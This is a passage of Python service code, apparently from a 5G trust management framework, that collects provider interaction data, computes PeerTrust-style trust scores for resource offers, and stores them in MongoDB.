if product_offering.index(i) < 111450:
"Added to avoid some malformed POs"
if "href" in i['productSpecification']:
href = i['productSpecification']['href']
id_product_offering = i['id']
"Added to avoid some malformed POs"
if len(i['place']) > 0:
product_offering_location = i['place'][0]['href']
category = i['category'][0]['name']
""" Obtaining the real product offer specification object"""
response = requests.get(href)
response = json.loads(response.text)
if 'relatedParty' in response:
did_provider = response['relatedParty'][0]['extendedInfo']
else:
did_provider = ''
""" Obtaining the location of the product offering object"""
response = requests.get(product_offering_location)
response = json.loads(response.text)
"Check whether the POs have location information"
new_object = {}
location = ""
if "city" and "country" and "locality" in response:
city = response['city']
country = response['country']
locality = response['locality']
x_coordinate = response['geographicLocation']['geometry'][0]['x']
y_coordinate = response['geographicLocation']['geometry'][0]['y']
z_coordinate = response['geographicLocation']['geometry'][0]['z']
location = str(x_coordinate)+"_"+str(y_coordinate)+"_"+str(z_coordinate)
"Initialise the object"
new_object["provider"] = did_provider
new_object["n_resource"] = 1
new_object[location] = 1
new_object["active"] = 0
new_object["active"+"_"+location] = 0
new_object["active"+"_"+category.lower()] = 0
new_object["active"+"_"+category.lower()+"_"+location] = 0
if i['lifecycleStatus'] == 'Active':
new_object["active"] = 1
new_object["active"+"_"+location] = 1
new_object["active"+"_"+category.lower()] = 1
new_object["active"+"_"+category.lower()+"_"+location] = 1
if not bool(statistic_catalog):
statistic_catalog.append(new_object)
elif bool(new_object):
"This variable will check whether we have a new provider in the Catalog"
new_provider = True
for product_offer in statistic_catalog:
if product_offer["provider"] == did_provider:
new_provider = False
product_offer["n_resource"] = product_offer["n_resource"] + new_object["n_resource"]
if location not in product_offer:
product_offer[location] = new_object[location]
else:
product_offer[location] = product_offer[location] + new_object[location]
product_offer['active'] = product_offer['active'] + new_object["active"]
if 'active'+"_"+location not in product_offer:
product_offer['active'+"_"+location] = new_object["active"+"_"+location]
else:
product_offer["active"+"_"+location] = product_offer["active"+"_"+location] + new_object["active"+"_"+location]
if "active"+"_"+category.lower() not in product_offer:
product_offer['active'+"_"+category.lower()] = new_object["active"+"_"+category.lower()]
else:
product_offer["active"+"_"+category.lower()] = product_offer["active"+"_"+category.lower()] + new_object["active"+"_"+category.lower()]
if "active"+"_"+category.lower()+"_"+location not in product_offer:
product_offer['active'+"_"+category.lower()+"_"+location] = new_object["active"+"_"+category.lower()+"_"+location]
else:
product_offer["active"+"_"+category.lower()+"_"+location] = product_offer["active"+"_"+category.lower()+"_"+location] + new_object["active"+"_"+category.lower()+"_"+location]
"Only when the provider is new, we add a new object"
if new_provider:
statistic_catalog.append(new_object)
old_product_offering = product_offering
class gather_information(Resource):
def post(self):
""" This method will retrieve information from the historical (MongoDB)+
search for supplier/offer interactions in the simulated DLT to retrieve recommendations from
other 5G-TRMFs. Currently there is no interaction with other 5G-TRMFs, we generate our
internal information """
global gather_time
""" Retrieve parameters from post request"""
req = request.data.decode("utf-8")
parameter = json.loads(req)
trustorDID = parameter["trustorDID"]
trusteeDID = parameter["trusteeDID"]
offerDID = parameter["offerDID"]
topic_name = parameter["topicName"]
print("$$$$$$$$$$$$$$ Starting data collection procces on ",trusteeDID, " $$$$$$$$$$$$$$\n")
start_time = time.time()
"""Read last value registered in the historical"""
last_trust_value = consumer.readLastTrustValueOffer(peerTrust.historical, trustorDID, trusteeDID, offerDID)
print("\nThe latest trust interaction (history) of "+trustorDID+" with "+trusteeDID+" was:\n",last_trust_value, "\n")
"""Read interactions related to a Trustee"""
interactions = self.getInteractionTrustee(trustorDID, trusteeDID)
print("Public information from "+trusteeDID+" interactions registered in the DLT:\n", interactions, "\n")
print("$$$$$$$$$$$$$$ Ending data collection procces on ",trusteeDID, " $$$$$$$$$$$$$$\n")
gather_time = gather_time + (time.time()-start_time)
###print("Gather time: ", gather_time)
""" Retrieve information from trustor and trustee """
trust_information = []
current_offer = {"trustorDID": trustorDID, "trusteeDID": trusteeDID, "offerDID": offerDID, "topicName": topic_name, "lastValue": last_trust_value, "trusteeInteractions": interactions}
trust_information.append(current_offer)
response = requests.post("http://localhost:5002/compute_trust_level", data=json.dumps(trust_information).encode("utf-8"))
response = json.loads(response.text)
return response
def getInteractionTrustee(self, trustorDID, trusteeDID):
""" This method retrieves all interactions related to a Trustee"""
return find_by_column("trustorDID", trusteeDID)
class compute_trust_level(Resource):
def post(self):
"""This method retrieves the last value of the Trustor for a particular Trustee and the Trustee's interactions.
It will then do the summation from its last computed value to the recent one by updating it trust value over
the trustee """
global compute_time
global satisfaction
global credibility
global TF
global CF
global offer_type
global considered_offer_list
global availableAssets
global totalAssets
global availableAssetLocation
global totalAssetLocation
global consideredOffers
global totalOffers
global consideredOfferLocation
global totalOfferLocation
global statistic_catalog
FORGETTING_FACTOR = 0.2
""" Retrieve parameters from post request"""
req = request.data.decode("utf-8")
parameter = json.loads(req)
for i in parameter:
print("$$$$$$$$$$$$$$ Starting trust computation procces on ",i['trusteeDID'], " $$$$$$$$$$$$$$\n")
start_time = time.time()
current_trustee = i['trusteeDID']
trustorDID = i['trustorDID']
offerDID = i['offerDID']
""" Recovering the last trust information """
last_trustee_interaction_registered = i['lastValue']['totalInteractionNumber']
last_satisfaction = i['lastValue']['trusteeSatisfaction']
last_credibility = i['lastValue']['credibility']
last_transaction_factor = i['lastValue']['transactionFactor']
last_community_factor = i['lastValue']['communityFactor']
last_interaction_number = i['lastValue']['interaction_number']
last_trust_value = i['lastValue']['trust_value']
last_trustor_satisfaction = i['lastValue']['userSatisfaction']
response = {"trustorDID": trustorDID, "trusteeDID": {"trusteeDID": current_trustee, "offerDID": offerDID}, "trust_value": i['lastValue']["trust_value"], "evaluation_criteria": "Inter-domain", "initEvaluationPeriod": i['lastValue']["initEvaluationPeriod"],"endEvaluationPeriod": i['lastValue']["endEvaluationPeriod"]}
""" Retrieving new trustee's interactions """
print("Checking if "+current_trustee+" has had new interactions from last time we interacted with it\n")
print("The last time "+trustorDID+" interacted with "+current_trustee+", it had had "+str(last_trustee_interaction_registered)+" interactions in total\n")
current_trustee_interactions = i['trusteeInteractions']
new_satisfaction = 0.0
new_credibility = 0.0
new_transaction_factor = 0.0
new_community_factor = 0.0
counter_new_interactions = 0
counter_new_CF_interactions = 0
"""Obtaining the last interaction registered by the Trustee in the DLT """
if len(current_trustee_interactions) > 0:
last_interaction_DLT = current_trustee_interactions[len(current_trustee_interactions)-1]
print("Currently, "+current_trustee+" has "+str(last_interaction_DLT['currentInteractionNumber'])+" interactions in total\n")
if int(last_interaction_DLT['currentInteractionNumber']) > last_trustee_interaction_registered:
print(int(last_interaction_DLT['currentInteractionNumber'])-last_trustee_interaction_registered, " new interactions should be contemplated to compute the new trust score on "+current_trustee+"\n")
print("%%%%%%%%%%%%%% Principal PeerTrust equation %%%%%%%%%%%%%%\n")
print("\tT(u) = α * ((∑ S(u,i) * Cr(p(u,i) * TF(u,i)) / I(u)) + β * CF(u)\n")
for new_interaction in current_trustee_interactions:
new_trustee_interaction = consumer.readLastTrustValues(peerTrust.historical, current_trustee, new_interaction['trusteeDID'], last_trustee_interaction_registered, new_interaction['currentInteractionNumber'])
if not bool(new_trustee_interaction):
new_interaction["last_trustee_interaction_registered"] = last_trustee_interaction_registered
endpoint = new_interaction["endpoint"].split("/")[2]
response = requests.post("http://"+endpoint+"/query_trust_info", data=json.dumps(new_interaction).encode("utf-8"))
if response.status_code == 200:
response = json.loads(response.text)
else:
print("Error:", response)
for interaction in response:
if bool(interaction):
peerTrust.historical.append(interaction)
for i in new_trustee_interaction:
print(new_interaction['trustorDID']," had an interaction with ", new_interaction['trusteeDID'],"\n")
print("\tS(u,i) ---> ", i["trustee"]["trusteeSatisfaction"])
new_satisfaction = new_satisfaction + i["trustee"]["trusteeSatisfaction"]
start_credibility = time.time()
current_credibility = peerTrust.credibility(current_trustee, new_interaction['trusteeDID'])
print("\tCr(p(u,i)) ---> ", round(current_credibility, 4))
new_credibility = new_credibility + current_credibility
credibility = credibility + (time.time()-start_credibility)
start_TF = time.time()
current_transaction_factor = peerTrust.transactionContextFactor(current_trustee, new_interaction['trusteeDID'], new_interaction['offerDID'])
print("\tTF(u,i) ---> ", current_transaction_factor)
new_transaction_factor = new_transaction_factor + current_transaction_factor
TF = TF + (time.time()-start_TF)
start_CF = time.time()
#current_community_factor = peerTrust.communityContextFactor2(current_trustee, new_interaction['trusteeDID'])
current_community_factor = peerTrust.bad_mouthing_attack_resilience(trustorDID, current_trustee, new_interaction['trusteeDID'], new_interaction['offerDID'])
print("\tCF(u) ---> ", current_community_factor, "\n")
new_community_factor = new_community_factor + current_community_factor
CF = CF + (time.time()-start_CF)
if current_community_factor > 0:
"It could be the case we don't have recommender for a new PO"
counter_new_CF_interactions += 1
counter_new_interactions +=1
else:
print("Currently, "+current_trustee+" has "+str(len(current_trustee_interactions))+" interactions in total\n")
"Only updates and applies forgetting factor whether there are new Trustee interactions"
if counter_new_interactions > 0:
""" Updating the last value with the summation of new interactions"""
new_satisfaction = round(self.recomputingTrustValue(last_satisfaction, (new_satisfaction/counter_new_interactions), FORGETTING_FACTOR), 4)
new_credibility = round(self.recomputingTrustValue(last_credibility, (new_credibility/counter_new_interactions), FORGETTING_FACTOR), 4)
new_transaction_factor = round(self.recomputingTrustValue(last_transaction_factor, (new_transaction_factor/counter_new_interactions), FORGETTING_FACTOR), 4)
else:
new_satisfaction = last_satisfaction
new_credibility = last_credibility
new_transaction_factor = last_transaction_factor
if counter_new_CF_interactions > 0:
new_community_factor = round(self.recomputingTrustValue(last_community_factor, (new_community_factor/counter_new_interactions), FORGETTING_FACTOR), 4)
else:
new_community_factor = last_community_factor
information = trustInformationTemplate.trustTemplate()
information["trustee"]["trusteeDID"] = current_trustee
information["trustee"]["offerDID"] = offerDID
information["trustee"]["trusteeSatisfaction"] = round(new_satisfaction, 4)
information["trustor"]["trustorDID"] = trustorDID
information["trustor"]["trusteeDID"] = current_trustee
information["trustor"]["offerDID"] = offerDID
information["trustor"]["credibility"] = round(new_credibility, 4)
information["trustor"]["transactionFactor"] = round(new_transaction_factor, 4)
information["trustor"]["communityFactor"] = round(new_community_factor, 4)
"If we don't have recommendations, we only rely on ourself"
if new_community_factor > 0:
direct_weighting = round(random.uniform(0.65, 0.7),2)
else:
direct_weighting = 1
information["trustor"]["direct_parameters"]["direct_weighting"] = direct_weighting
information["trustor"]["indirect_parameters"]["recommendation_weighting"] = round(1-direct_weighting, 4)
#information["trustor"]["direct_parameters"]["interactionNumber"] = last_interaction_number+1
information["trustor"]["direct_parameters"]["interactionNumber"] = peerTrust.getInteractionNumber(trustorDID, current_trustee, offerDID)
#print(peerTrust.getLastTotalInteractionNumber(current_trustee))
information["trustor"]["direct_parameters"]["totalInteractionNumber"] = peerTrust.getLastTotalInteractionNumber(current_trustee)
#information["trustor"]["direct_parameters"]["totalInteractionNumber"] = last_interaction_DLT['currentInteractionNumber']
information["trustor"]["direct_parameters"]["feedbackNumber"] = peerTrust.getTrusteeFeedbackNumberDLT(current_trustee)
information["trustor"]["direct_parameters"]["feedbackOfferNumber"] = peerTrust.getOfferFeedbackNumberDLT(current_trustee, offerDID)
information["trust_value"] = round(direct_weighting*(new_satisfaction*new_credibility*new_transaction_factor)+(1-direct_weighting)*new_community_factor,4)
information["currentInteractionNumber"] = peerTrust.getCurrentInteractionNumber(trustorDID)
information["initEvaluationPeriod"] = datetime.timestamp(datetime.now())-1000
information["endEvaluationPeriod"] = datetime.timestamp(datetime.now())
""" These values should be requested from other 5GZORRO components in future releases, in particular,
from the Calatog and SLA Breach Predictor"""
start_satisfaction = time.time()
availableAssets = 0
totalAssets = 0
availableAssetLocation = 0
totalAssetLocation = 0
consideredOffers = 0
totalOffers= 0
consideredOfferLocation = 0
totalOfferLocation = 0
"5GBarcelona"
load_dotenv()
barcelona_address = os.getenv('5GBARCELONA_CATALOG_A')
response = requests.get(barcelona_address+"productCatalogManagement/v4/productOffering/did/"+offerDID)
"5TONIC"
#madrid_address = os.getenv('5TONIC_CATALOG_A')
#response = requests.get(madrid_address+"productCatalogManagement/v4/productOffering/did/")
response = json.loads(response.text)
place = response['place'][0]['href']
response = requests.get(place)
response = json.loads(response.text)
city = response['city']
country = response['country']
locality = response['locality']
x_coordinate = response['geographicLocation']['geometry'][0]['x']
y_coordinate = response['geographicLocation']['geometry'][0]['y']
z_coordinate = response['geographicLocation']['geometry'][0]['z']
for product_offer in statistic_catalog:
if product_offer['provider'] == current_trustee:
totalAssets = product_offer['n_resource']
location = x_coordinate+"_"+y_coordinate+"_"+z_coordinate
if location in product_offer:
"Updating global variables"
totalAssetLocation = product_offer[location]
availableAssets = product_offer['active']
availableAssetLocation = product_offer['active'+"_"+location]
totalOffers = product_offer['active'+"_"+offer_type[offerDID].lower()]
totalOfferLocation = product_offer['active'+"_"+offer_type[offerDID].lower()+"_"+location]
break
"""Calculate the statistical parameters with respect to the considered offers"""
for offer in considered_offer_list:
if offer['trusteeDID'] == current_trustee:
consideredOffers+=1
"5GBarcelona"
load_dotenv()
barcelona_address = os.getenv('5GBARCELONA_CATALOG_A')
response = requests.get(barcelona_address+"productCatalogManagement/v4/productOffering/did/"+offer['offerDID'])
#madrid_address = os.getenv('5TONIC_CATALOG_A')
#response = requests.get(madrid_address+"productCatalogManagement/v4/productOffering/did/"+offer['offerDID'])
response = json.loads(response.text)
current_offer_place = response['place'][0]['href']
response = requests.get(current_offer_place)
response = json.loads(response.text)
"Check whether the POs have location information"
if "city" and "country" and "locality" in response:
current_offer_city = response['city']
current_offer_country = response['country']
current_offer_locality = response['locality']
current_offer_x_coordinate = response['geographicLocation']['geometry'][0]['x']
current_offer_y_coordinate = response['geographicLocation']['geometry'][0]['y']
current_offer_z_coordinate = response['geographicLocation']['geometry'][0]['z']
if city == current_offer_city and country == current_offer_country and locality == \
current_offer_locality and x_coordinate == current_offer_x_coordinate and \
y_coordinate == current_offer_y_coordinate and z_coordinate == current_offer_z_coordinate:
consideredOfferLocation+=1
"These parameter should be collected from SLA Breach Predictor in the future"
managedViolations = random.randint(1,20)
predictedViolations = managedViolations + random.randint(0,5)
executedViolations = random.randint(0,6)
nonPredictedViolations = random.randint(0,2)
managedOfferViolations = random.randint(4,22)
predictedOfferViolations = managedOfferViolations + random.randint(0,8)
executedOfferViolations = random.randint(0,4)
nonPredictedOfferViolations = random.randint(0,3)
provider_reputation = peerTrust.providerReputation(availableAssets, totalAssets,availableAssetLocation,
totalAssetLocation,managedViolations, predictedViolations,
executedViolations, nonPredictedViolations)
information["trustor"]["direct_parameters"]["availableAssets"] = availableAssets
information["trustor"]["direct_parameters"]["totalAssets"] = totalAssets
information["trustor"]["direct_parameters"]["availableAssetLocation"] = availableAssetLocation
information["trustor"]["direct_parameters"]["totalAssetLocation"] = totalAssetLocation
information["trustor"]["direct_parameters"]["managedViolations"] = managedViolations
information["trustor"]["direct_parameters"]["predictedViolations"] = predictedOfferViolations
information["trustor"]["direct_parameters"]["executedViolations"] = executedViolations
information["trustor"]["direct_parameters"]["nonPredictedViolations"] = nonPredictedViolations
offer_reputation = peerTrust.offerReputation(consideredOffers, totalOffers, consideredOfferLocation,
totalOfferLocation, managedOfferViolations,
predictedOfferViolations, executedOfferViolations,
nonPredictedOfferViolations)
information["trustor"]["direct_parameters"]["consideredOffers"] = consideredOffers
information["trustor"]["direct_parameters"]["totalOffers"] = totalOffers
information["trustor"]["direct_parameters"]["consideredOfferLocation"] = consideredOfferLocation
information["trustor"]["direct_parameters"]["totalOfferLocation"] = totalOfferLocation
information["trustor"]["direct_parameters"]["managedOfferViolations"] = managedOfferViolations
information["trustor"]["direct_parameters"]["predictedOfferViolations"] = predictedOfferViolations
information["trustor"]["direct_parameters"]["executedOfferViolations"] = executedOfferViolations
information["trustor"]["direct_parameters"]["nonPredictedOfferViolations"] = nonPredictedOfferViolations
satisfaction = satisfaction + (time.time()-start_satisfaction)
start_satisfaction = time.time()
provider_satisfaction = peerTrust.providerSatisfaction(trustorDID, current_trustee, provider_reputation, consumer)
offer_satisfaction = peerTrust.offerSatisfaction(trustorDID, current_trustee, offerDID, offer_reputation)
information["trustor"]["direct_parameters"]["providerSatisfaction"] = round(provider_satisfaction, 4)
ps_weighting = round(random.uniform(0.4, 0.6),2)
information["trustor"]["direct_parameters"]["PSWeighting"] = ps_weighting
information["trustor"]["direct_parameters"]["offerSatisfaction"] = round(offer_satisfaction, 4)
os_weighting = 1-ps_weighting
information["trustor"]["direct_parameters"]["OSWeighting"] = os_weighting
information["trustor"]["direct_parameters"]["providerReputation"] = round(provider_reputation, 4)
information["trustor"]["direct_parameters"]["offerReputation"] = round(offer_reputation, 4)
new_trustor_satisfaction = round(peerTrust.satisfaction(ps_weighting, os_weighting, provider_satisfaction, offer_satisfaction), 4)
information["trustor"]["direct_parameters"]["userSatisfaction"] = round(self.recomputingTrustValue(last_trustor_satisfaction, new_trustor_satisfaction, FORGETTING_FACTOR), 4)
new_trustor_satisfaction = information["trustor"]["direct_parameters"]["userSatisfaction"]
satisfaction = satisfaction + (time.time()-start_satisfaction)
"""Updating the recommendation trust"""
recommendation_list = consumer.readAllRecommenders(peerTrust.historical, trustorDID, current_trustee)
new_recommendation_list = []
for recommendation in recommendation_list:
satisfaction_variance= last_trustor_satisfaction - new_trustor_satisfaction
new_recommendation_trust = self.recomputingRecommendationTrust(satisfaction_variance, recommendation)
recommendation["recommendation_trust"] = new_recommendation_trust
new_recommendation_list.append(recommendation)
if bool(new_recommendation_list):
information["trustor"]["indirect_parameters"]["recommendations"] = new_recommendation_list
response = {"trustorDID": trustorDID, "trusteeDID": {"trusteeDID": current_trustee, "offerDID": offerDID}, "trust_value": information["trust_value"], "currentInteractionNumber": information["currentInteractionNumber"],"evaluation_criteria": "Inter-domain", "initEvaluationPeriod": information["initEvaluationPeriod"],"endEvaluationPeriod": information["endEvaluationPeriod"]}
print("\nNew Trust values after considering new interactions of "+current_trustee+":")
print("\tα ---> ", direct_weighting)
print("\tS(u,i) ---> ", new_satisfaction)
print("\tCr(p(u,i)) ---> ", new_credibility)
print("\tTF(u,i) ---> ", new_transaction_factor)
print("\tβ ---> ", round(1-direct_weighting, 3))
print("\tCF(u) ---> ", new_community_factor)
print("\nPrevious Trust score of "+trustorDID+" on "+current_trustee+" --->", last_trust_value, " -- New trust score --->", information["trust_value"])
#print("$$$$$ Historical: \n", peerTrust.historical)
#last_trust_value = consumer.readLastTrustValueOffer(peerTrust.historical, trustorDID, current_trustee, offerDID)
#print("$$$$$ Last Value: ", last_trust_value)
peerTrust.historical.append(information)
#if information in peerTrust.historical:
#print("Guardado: \n", information['trustor']['direct_parameters']['totalInteractionNumber'], time.time())
#print("$$$$$ Historical after: \n", peerTrust.historical)
compute_time = compute_time + (time.time()-start_time)
###print("Compute time:", compute_time)
print("\n$$$$$$$$$$$$$$ Ending trust computation procces on ",current_trustee, " $$$$$$$$$$$$$$\n")
requests.post("http://localhost:5002/store_trust_level", data=json.dumps(information).encode("utf-8"))
return response
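# Illustrative note (editor's sketch, values are hypothetical): the trust_value computed above follows a
# PeerTrust-style combination T = alpha*(S * Cr * TF) + (1 - alpha)*CF. For example, with alpha = 0.68,
# S = 0.9, Cr = 0.8, TF = 0.85 and CF = 0.7:
#   T = 0.68*(0.9*0.8*0.85) + 0.32*0.7 = 0.68*0.612 + 0.224 = 0.6402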
def recomputingRecommendationTrust(self, satisfaction_variance, recommendation_object):
""" This method updates the recommendation trust (RT) value after new interactions between a trustor and a trustee.
The method makes use of the satisfaction and recommendation variances to increase or decrease the RT."""
mean_variance = recommendation_object["average_recommendations"] - recommendation_object["last_recommendation"]
if satisfaction_variance > 0 and mean_variance > 0:
new_recommendation_trust = (1 + satisfaction_variance)*(mean_variance/10) + recommendation_object["recommendation_trust"]
if new_recommendation_trust > 1.0:
new_recommendation_trust = 1.0
return new_recommendation_trust
elif satisfaction_variance < 0 and mean_variance < 0:
new_recommendation_trust = (1 + abs(satisfaction_variance))*(abs(mean_variance)/10) + recommendation_object["recommendation_trust"]
if new_recommendation_trust > 1.0:
new_recommendation_trust = 1.0
return new_recommendation_trust
elif satisfaction_variance < 0 and mean_variance > 0:
new_recommendation_trust = recommendation_object["recommendation_trust"] - (1 - satisfaction_variance)*(mean_variance/10)
if new_recommendation_trust < 0:
new_recommendation_trust = 0
return new_recommendation_trust
elif satisfaction_variance > 0 and mean_variance < 0:
new_recommendation_trust = recommendation_object["recommendation_trust"] - (1 + satisfaction_variance)*(abs(mean_variance)/10)
if new_recommendation_trust < 0:
new_recommendation_trust = 0
return new_recommendation_trust
elif mean_variance == 0:
return recommendation_object["recommendation_trust"]
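# Illustrative example (hypothetical numbers): satisfaction_variance = last - new, so a positive value
# means satisfaction dropped; mean_variance > 0 means the recommender's last recommendation was below its
# own average. If both agree (e.g. satisfaction_variance = 0.05, mean_variance = 0.2) and the previous
# recommendation_trust is 0.7, the first branch gives (1 + 0.05)*(0.2/10) + 0.7 = 0.021 + 0.7 = 0.721.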
def recomputingTrustValue(self, historical_value, new_value, forgetting_factor):
""" This method applies a sliding window to compute a new trust score. Besides, we avoid new values can
immediately change an historical value through the forgetting factor """
return (1-forgetting_factor) * historical_value + forgetting_factor * new_value
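# Illustrative example (hypothetical numbers): with forgetting_factor = 0.2, a historical value of 0.8
# and a new value of 0.4, the sliding window yields (1 - 0.2)*0.8 + 0.2*0.4 = 0.64 + 0.08 = 0.72,
# so a single very good or very bad interaction only shifts the score gradually.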
class store_trust_level(Resource):
def post(self):
""" This method is employed to register direct trust in our internal database """
global storage_time
req = request.data.decode("utf-8")
information = json.loads(req)
print("$$$$$$$$$$$$$$ Starting trust information storage process $$$$$$$$$$$$$$\n")
start_time = time.time()
print("Registering a new trust interaction between two domains in the DLT\n")
data = "{\"trustorDID\": \""+information["trustor"]["trustorDID"]+"\", \"trusteeDID\": \""+information["trustee"]["trusteeDID"]+"\", \"offerDID\": \""+information["trustee"]["offerDID"]+"\",\"userSatisfaction\": "+str(information["trustor"]["direct_parameters"]["userSatisfaction"])+", \"interactionNumber\": "+str(information["trustor"]["direct_parameters"]["interactionNumber"])+", \"totalInteractionNumber\": "+str(information["trustor"]["direct_parameters"]["totalInteractionNumber"])+", \"currentInteractionNumber\": "+str(information["currentInteractionNumber"])+"}\""
print(data,"\n")
print("Sending new trust information in the historical generated by the Trust Management Framework \n")
print(information)
print("\nStoring new trust information in our internal MongoDB database\n")
print("\n$$$$$$$$$$$$$$ Ending trust information storage process $$$$$$$$$$$$$$\n")
"""list_trustee_interactions = {}
query = mongoDB.find_one(information["trustee"]["trusteeDID"])
if query is not None:
list_trustee_interactions[information["trustee"]["trusteeDID"]].append(information)
mongoDB.update_one(query, list_trustee_interactions)
else:
list_trustee_interactions[information["trustee"]["trusteeDID"]] = [information]
mongoDB.insert_one(list_trustee_interactions)"""
mongoDB.insert_one(information)
#pprint.pprint(mongoDB.find_one({"trustorDID": trustorDID}))
#mongoDB.insert_many([tutorial2, tutorial1])
#for doc in mongoDB.find():
#pprint.pprint(doc)
storage_time = storage_time + (time.time()-start_time)
###print("Storage time:", storage_time)
return 200
class update_trust_level(Resource):
def post(self):
""" This method updates a trust score based on certain SLA events. More events need to be considered,
it is only an initial version"""
global offer_type
req = request.data.decode("utf-8")
information = json.loads(req)
print("\n$$$$$$$$$$$$$$ Starting update trust level process on", information["offerDID"], "$$$$$$$$$$$$$$\n")
#slaBreachPredictor_topic = information["SLABreachPredictor"]
#trustorDID = information["trustor"]["trustorDID"]
#trusteeDID = information["trustor"]["trusteeDID"]
#offerDID = information["trustor"]["offerDID"]
offerDID = information["offerDID"]
" Equation for calculating new trust --> n_ts = n_ts+o_ts*((1-n_ts)/10) from security events"
last_trust_score = consumer.readAllInformationTrustValue(peerTrust.historical, offerDID)
""" Defining a new thread per each trust relationship as well as an event to stop the relationship"""
event = threading.Event()
x = threading.Thread(target=self.reward_and_punishment_based_on_security, args=(last_trust_score, offer_type, event,))
threads.append({offerDID:x, "stop_event": event})
x.start()
#notifications = consumer.readSLANotification(peerTrust.historical, slaBreachPredictor_topic, trustorDID, trusteeDID, offerDID)
#positive_notification = "was able to manage the SLA violation successfully"
#negative_notification = "was not able to manage the SLA violation successfully"
#first_range_probability = 0.25
#second_range_probability = 0.50
#third_range_probability = 0.75
#fourth_range_probability = 1.0
#new_trust_score = 0.0
#for notification in notifications:
#print("Notification received from the SLA Breach Predictor about", notification["breachPredictionNotification"],":\n")
#current_notification = notification["notification"]
#print("\t-", current_notification,"\n")
#likehood = notification["breachPredictionNotification"]["value"]
#last_trust_score = consumer.readAllInformationTrustValue(peerTrust.historical, trustorDID, trusteeDID, offerDID)
#if positive_notification in current_notification:
#if likehood <= first_range_probability:
#new_trust_score = last_trust_score["trust_value"] + last_trust_score["trust_value"]*0.075
#elif likehood <= second_range_probability:
#new_trust_score = last_trust_score["trust_value"] + last_trust_score["trust_value"]*0.10
#elif likehood <= third_range_probability:
#new_trust_score = last_trust_score["trust_value"] + last_trust_score["trust_value"]*0.125
#elif likehood <= fourth_range_probability:
#new_trust_score = last_trust_score["trust_value"] + last_trust_score["trust_value"]*0.15
#elif negative_notification in current_notification:
#if likehood <= first_range_probability:
#new_trust_score = last_trust_score["trust_value"] - last_trust_score["trust_value"]*0.10
#elif likehood <= second_range_probability:
#new_trust_score = last_trust_score["trust_value"] - last_trust_score["trust_value"]*0.125
#elif likehood <= third_range_probability:
#new_trust_score = last_trust_score["trust_value"] - last_trust_score["trust_value"]*0.15
#elif likehood <= fourth_range_probability:
#new_trust_score = last_trust_score["trust_value"] - last_trust_score["trust_value"]*0.175
#if new_trust_score > 1.0:
#new_trust_score = 1.0
#elif new_trust_score < 0.0:
#new_trust_score = 0.0
#print("\t\tPrevious Trust Score", last_trust_score ["trust_value"], " --- Updated Trust Score --->", round(new_trust_score, 3), "\n")
#last_trust_score["trust_value"] = round(new_trust_score, 3)
#last_trust_score["endEvaluationPeriod"] = datetime.timestamp(datetime.now())
#peerTrust.historical.append(last_trust_score)
#mongoDB.insert_one(last_trust_score)
#print("\n$$$$$$$$$$$$$$ Ending update trust level process $$$$$$$$$$$$$$\n")
return 200
def reward_and_punishment_based_on_security(self, last_trust_score, offer_type, event):
"""" This method is in charge of updating an ongoing trust relationship after each 30 minutes employing security
monitoring events reported by the Security Analysis Service"""
"Sliding window weighting with respect to the forgetting factor"
TOTAL_RW = 0.9
NOW_RW = 1 - TOTAL_RW
"Sliding window definition IN SECONDS"
CURRENT_TIME_WINDOW = 1800
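# Illustrative note (hypothetical numbers): the sliding window below combines the accumulated
# reward/punishment with the value observed in the current window as TOTAL_RW*historical + NOW_RW*current;
# e.g. 0.9*0.6 + 0.1*0.9 = 0.63, so a single window cannot drastically change the security assessment.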
total_reward_and_punishment = float(last_trust_score["trustor"]["reward_and_punishment"])
offerDID = last_trust_score["trustor"]["offerDID"]
current_offer_type = offer_type[offerDID]
while not event.isSet():
time.sleep(CURRENT_TIME_WINDOW)
current_reward_and_punishment = 0.0
if current_offer_type.lower() == 'ran' or current_offer_type.lower() == 'spectrum':
current_reward_and_punishment = self.generic_reward_and_punishment_based_on_security(CURRENT_TIME_WINDOW, offerDID, current_offer_type, 0.4, 0.1, 0.1, 0.4)
elif current_offer_type.lower() == 'edge' or current_offer_type.lower() == 'cloud':
current_reward_and_punishment = self.generic_reward_and_punishment_based_on_security(CURRENT_TIME_WINDOW, offerDID, current_offer_type, 0.2, 0.35, 0.25, 0.2)
elif current_offer_type.lower() == 'vnf' or current_offer_type.lower() == 'cnf':
current_reward_and_punishment = self.generic_reward_and_punishment_based_on_security(CURRENT_TIME_WINDOW, offerDID, current_offer_type, 0.233, 0.3, 0.233, 0.233)
elif current_offer_type.lower() == 'network service' or current_offer_type.lower() == 'slice':
"We deal in particular with offers of the network service/slice type"
resource_specification_list = self.get_resource_list_network_service_offer(offerDID)
for resource in resource_specification_list:
resource_specification = resource['href']
response = requests.get(resource_specification)
response = json.loads(response.text)
type = response['resourceSpecCharacteristic'][0]['name']
if 'ran' in type.lower():
current_offer_type = 'ran'
current_reward_and_punishment = current_reward_and_punishment + self.generic_reward_and_punishment_based_on_security(CURRENT_TIME_WINDOW, offerDID, current_offer_type, 0.4, 0.1, 0.1, 0.4)
elif 'spectrum' in type.lower():
current_offer_type = 'spectrum'
current_reward_and_punishment = current_reward_and_punishment + self.generic_reward_and_punishment_based_on_security(CURRENT_TIME_WINDOW, offerDID, current_offer_type, 0.4, 0.1, 0.1, 0.4)
elif 'edge' in type.lower():
current_offer_type = 'edge'
current_reward_and_punishment = current_reward_and_punishment + self.generic_reward_and_punishment_based_on_security(CURRENT_TIME_WINDOW, offerDID, current_offer_type, 0.2, 0.35, 0.25, 0.2)
elif 'cloud' in type.lower():
current_offer_type = 'cloud'
current_reward_and_punishment = current_reward_and_punishment + self.generic_reward_and_punishment_based_on_security(CURRENT_TIME_WINDOW, offerDID, current_offer_type, 0.2, 0.35, 0.25, 0.2)
elif 'vnf' in type.lower():
current_offer_type = 'vnf'
current_reward_and_punishment = current_reward_and_punishment + self.generic_reward_and_punishment_based_on_security(CURRENT_TIME_WINDOW, offerDID, current_offer_type, 0.233, 0.3, 0.233, 0.233)
elif 'cnf' in type.lower():
current_offer_type = 'cnf'
current_reward_and_punishment = current_reward_and_punishment + self.generic_reward_and_punishment_based_on_security(CURRENT_TIME_WINDOW, offerDID, current_offer_type, 0.233, 0.3, 0.233, 0.233)
current_reward_and_punishment = current_reward_and_punishment / len(resource_specification_list)
if current_reward_and_punishment >= 0:
final_security_reward_and_punishment = TOTAL_RW * total_reward_and_punishment + NOW_RW * current_reward_and_punishment
if final_security_reward_and_punishment >= 0.5:
reward_and_punishment = final_security_reward_and_punishment - 0.5
